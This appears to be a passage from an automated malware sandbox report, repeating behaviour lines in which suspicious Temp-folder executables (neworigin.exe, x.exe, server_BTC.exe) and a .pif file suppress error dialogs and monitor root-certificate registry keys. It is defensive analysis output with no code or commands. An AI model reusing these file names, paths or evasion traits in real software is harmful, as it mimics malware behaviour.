Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
